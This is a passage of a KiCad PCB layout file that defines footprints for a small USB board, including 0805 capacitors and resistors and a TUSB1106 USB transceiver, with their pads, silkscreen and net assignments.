F.Fab) (width 0.1)) (fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05)) (pad 2 smd roundrect (at 1.025 0) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 1 GND)) (pad 1 smd roundrect (at -1.025 0) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 8 /PP3300_REG)) (model ${KISYS3DMOD}/Capacitor_SMD.3dshapes/C_0805_2012Metric.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module Capacitor_SMD:C_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5F5605B9) (at 94.615 62.865 180) (descr "Capacitor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator") (tags "capacitor handsolder") (path /5F5E3EA0) (attr smd) (fp_text reference C1 (at 4.055 0) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 100n (at 0 1.65) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user %R (at 0 0) (layer F.Fab) (effects (font (size 0.5 0.5) (thickness 0.08))) ) (fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05)) (pad 2 smd roundrect (at 1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 1 GND)) (pad 1 smd roundrect (at -1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 7 /PP5000_VBUS)) (model ${KISYS3DMOD}/Capacitor_SMD.3dshapes/C_0805_2012Metric.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module footprints:TUSB1106PWR (layer F.Cu) (tedit 0) (tstamp 5F56C6B9) (at 96.52 58.42 180) (path /5F6108E9) (fp_text reference U1 (at -1.27 -3.81) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value TUSB1106PWR (at 10.922 -9.525) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_arc (start 0 -2.5527) (end 0.3048 -2.5527) (angle 180) (layer F.Fab) (width 0.1524)) (fp_arc (start 0 -2.5527) (end 0.3048 -2.5527) (angle 180) (layer F.SilkS) (width 0.1524)) (fp_text user * (at -3.0734 -3.773601) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user * (at -3.0734 -3.773601) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user .066in/1.676mm (at -2.8194 4.9657) (layer Dwgs.User) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user .222in/5.639mm (at 0 -4.9657) (layer Dwgs.User) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user .014in/.356mm (at 5.8674 -2.275) (layer Dwgs.User) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user 2.559055E-02in/.65mm (at -5.8674 -1.950001) (layer Dwgs.User) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user * (at -3.0734 -3.773601) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user * (at -3.0734 -3.773601) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user "Copyright 2016 Accelerated Designs. All rights reserved." (at 0 0) (layer Cmts.User) (effects (font (size 0.127 0.127) (thickness 0.002))) ) (fp_line (start -2.2479 -2.1226) (end -2.2479 -2.4274) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 -2.4274) (end -3.302 -2.4274) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 -2.4274) (end -3.302 -2.1226) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 -2.1226) (end -2.2479 -2.1226) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 -1.472601) (end -2.2479 -1.777401) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 -1.777401) (end -3.302 -1.777401) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 -1.777401) (end -3.302 -1.472601) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 -1.472601) (end -2.2479 -1.472601) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 -0.822601) (end -2.2479 -1.127401) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 -1.127401) (end -3.302 -1.127401) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 -1.127401) (end -3.302 -0.822601) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 -0.822601) (end -2.2479 -0.822601) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 -0.172601) (end -2.2479 -0.477401) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 -0.477401) (end -3.302 -0.477401) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 -0.477401) (end -3.302 -0.172601) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 -0.172601) (end -2.2479 -0.172601) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 0.477399) (end -2.2479 0.172599) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 0.172599) (end -3.302 0.172599) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 0.172599) (end -3.302 0.477399) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 0.477399) (end -2.2479 0.477399) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 1.127399) (end -2.2479 0.822599) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 0.822599) (end -3.302 0.822599) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 0.822599) (end -3.302 1.127399) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 1.127399) (end -2.2479 1.127399) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 1.777399) (end -2.2479 1.472599) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 1.472599) (end -3.302 1.472599) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 1.472599) (end -3.302 1.777399) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 1.777399) (end -2.2479 1.777399) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 2.427399) (end -2.2479 2.122599) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 2.122599) (end -3.302 2.122599) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 2.122599) (end -3.302 2.427399) (layer F.Fab) (width 0.1524)) (fp_line (start -3.302 2.427399) (end -2.2479 2.427399) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 2.1226) (end 2.2479 2.4274) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 2.4274) (end 3.302 2.4274) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 2.4274) (end 3.302 2.1226) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 2.1226) (end 2.2479 2.1226) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 1.472601) (end 2.2479 1.777401) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 1.777401) (end 3.302 1.777401) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 1.777401) (end 3.302 1.472601) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 1.472601) (end 2.2479 1.472601) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 0.822601) (end 2.2479 1.127401) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 1.127401) (end 3.302 1.127401) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 1.127401) (end 3.302 0.822601) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 0.822601) (end 2.2479 0.822601) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 0.172601) (end 2.2479 0.477401) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 0.477401) (end 3.302 0.477401) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 0.477401) (end 3.302 0.172601) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 0.172601) (end 2.2479 0.172601) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 -0.477399) (end 2.2479 -0.172599) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 -0.172599) (end 3.302 -0.172599) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 -0.172599) (end 3.302 -0.477399) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 -0.477399) (end 2.2479 -0.477399) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 -1.127399) (end 2.2479 -0.822599) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 -0.822599) (end 3.302 -0.822599) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 -0.822599) (end 3.302 -1.127399) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 -1.127399) (end 2.2479 -1.127399) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 -1.777399) (end 2.2479 -1.472599) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 -1.472599) (end 3.302 -1.472599) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 -1.472599) (end 3.302 -1.777399) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 -1.777399) (end 2.2479 -1.777399) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 -2.427399) (end 2.2479 -2.122599) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 -2.122599) (end 3.302 -2.122599) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 -2.122599) (end 3.302 -2.427399) (layer F.Fab) (width 0.1524)) (fp_line (start 3.302 -2.427399) (end 2.2479 -2.427399) (layer F.Fab) (width 0.1524)) (fp_line (start -1.663811 2.5527) (end 1.663811 2.5527) (layer F.SilkS) (width 0.1524)) (fp_line (start 1.663811 -2.5527) (end -1.663811 -2.5527) (layer F.SilkS) (width 0.1524)) (fp_line (start -2.2479 2.5527) (end 2.2479 2.5527) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 2.5527) (end 2.2479 -2.5527) (layer F.Fab) (width 0.1524)) (fp_line (start 2.2479 -2.5527) (end -2.2479 -2.5527) (layer F.Fab) (width 0.1524)) (fp_line (start -2.2479 -2.5527) (end -2.2479 2.5527) (layer F.Fab) (width 0.1524)) (fp_line (start 4.1656 1.434501) (end 4.1656 1.815501) (layer F.SilkS) (width 0.1524)) (fp_line (start 4.1656 1.815501) (end 3.9116 1.815501) (layer F.SilkS) (width 0.1524)) (fp_line (start 3.9116 1.815501) (end 3.9116 1.434501) (layer F.SilkS) (width 0.1524)) (fp_line (start 3.9116 1.434501) (end 4.1656 1.434501) (layer F.SilkS) (width 0.1524)) (fp_line (start -3.9116 2.8067) (end -3.9116 -2.8067) (layer F.CrtYd) (width 0.1524)) (fp_line (start -3.9116 -2.8067) (end 3.9116 -2.8067) (layer F.CrtYd) (width 0.1524)) (fp_line (start 3.9116 -2.8067) (end 3.9116 2.8067) (layer F.CrtYd) (width 0.1524)) (fp_line (start 3.9116 2.8067) (end -3.9116 2.8067) (layer F.CrtYd) (width 0.1524)) (pad 16 smd rect (at 2.8194 -2.274999 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 7 /PP5000_VBUS)) (pad 15 smd rect (at 2.8194 -1.624998 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 8 /PP3300_REG)) (pad 14 smd rect (at 2.8194 -0.974999 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 17 /DM_TX)) (pad 13 smd rect (at 2.8194 -0.324998 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 18 /DP_TX)) (pad 12 smd rect (at 2.8194 0.325001 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 4 /DP1_R)) (pad 11 smd rect (at 2.8194 0.974999 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 3 /DN1_R)) (pad 10 smd rect (at 2.8194 1.625001 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 19 /SPD)) (pad 9 smd rect (at 2.8194 2.274999 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 9 PP3300)) (pad 8 smd rect (at -2.8194 2.274999 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 1 GND)) (pad 7 smd rect (at -2.8194 1.624998 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 16 /SUS)) (pad 6 smd rect (at -2.8194 0.974999 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 12 /DN_RX)) (pad 5 smd rect (at -2.8194 0.324998 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 11 /DP_RX)) (pad 4 smd rect (at -2.8194 -0.325001 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 13 /D_RX)) (pad 3 smd rect (at -2.8194 -0.974999 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 15 /USB_OE_L)) (pad 2 smd rect (at -2.8194 -1.625001 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 10 /PULLUPDP)) (pad 1 smd rect (at -2.8194 -2.274999 180) (size 1.6764 0.3556) (layers F.Cu F.Paste F.Mask) (net 14 /PP3300_PU)) ) (module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5C92AED6) (at 88.265 50.8 180) (descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator") (tags "resistor handsolder") (path /5C7E6727) (attr smd) (fp_text reference R1 (at 0 1.905 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 22R (at 0 1.65 180) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_text user %R (at 0 0 180) (layer F.Fab) (effects (font (size 0.5 0.5) (thickness 0.08))) ) (pad 1 smd roundrect (at -1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 3 /DN1_R)) (pad 2 smd roundrect (at 1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 2 /DN1)) (model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5C92AEE7) (at 87.63 53.34 180) (descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator") (tags "resistor handsolder") (path /5C7E65B5) (attr smd) (fp_text reference R2 (at 0 -1.905) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 22R (at 0 1.65) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12)) (fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1)) (fp_text user %R (at 0 0) (layer F.Fab) (effects (font (size 0.5 0.5) (thickness 0.08))) ) (pad 2 smd roundrect (at 1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 5 /DP1)) (pad 1 smd roundrect (at -1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 4 /DP1_R)) (model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5C92AEF8) (at 92.71 49.285 90) (descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator") (tags "resistor handsolder") (path /5C7F09F9) (attr smd) (fp_text reference R3 (at 0.39 -1.905 270) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 5k1 (at 0 1.65 270) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12)) (fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1)) (fp_text user %R (at 0 0 270) (layer F.Fab) (effects (font (size 0.5 0.5) (thickness 0.08))) ) (pad 2 smd roundrect (at 1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 6 /SENSE1)) (pad 1 smd roundrect (at -1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 7 /PP5000_VBUS)) (model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5C92AF09) (at 96.52 49.285 270) (descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator") (tags "resistor handsolder") (path /5C7F0A6A) (attr smd) (fp_text reference R4 (at -0.39 -1.905 270) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 5k1 (at 0 1.65 270) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_text user %R (at 0 0 270) (layer F.Fab) (effects (font (size 0.5 0.5) (thickness 0.08))) ) (pad 1 smd roundrect (at -1.025 0 270) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 6 /SENSE1)) (pad 2 smd roundrect (at 1.025 0 270) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 1 GND)) (model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5C92AF1A) (at 87.63 58.42 180) (descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator") (tags "resistor handsolder") (path /5C7E74B9) (attr smd) (fp_text reference R5 (at 0 -1.65 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 1k5 (at 0 1.65 180) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12)) (fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1)) (fp_text user %R (at 0 0 180) (layer F.Fab) (effects (font (size 0.5 0.5) (thickness 0.08))) ) (pad 2 smd roundrect (at 1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 5 /DP1)) (pad 1 smd roundrect (at -1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 14 /PP3300_PU)) (model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5C92AF2B) (at 91.44 53.34 90) (descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator") (tags "resistor handsolder") (path /5F5C2525) (attr smd) (fp_text reference R6 (at -3.175 -0.635 270) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 5k1 (at 0 1.65 270) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_text user %R (at 0 0 270) (layer F.Fab) (effects (font (size 0.5 0.5) (thickness 0.08))) ) (pad 1 smd roundrect (at -1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 19 /SPD)) (pad 2 smd roundrect (at 1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 9 PP3300)) (model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5C92AF3C) (at 100.33 53.34) (descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator") (tags "resistor handsolder") (path /5F5B9CD4) (attr smd) (fp_text reference R7 (at 0 -1.905) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 5k1 (at 0 1.65) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 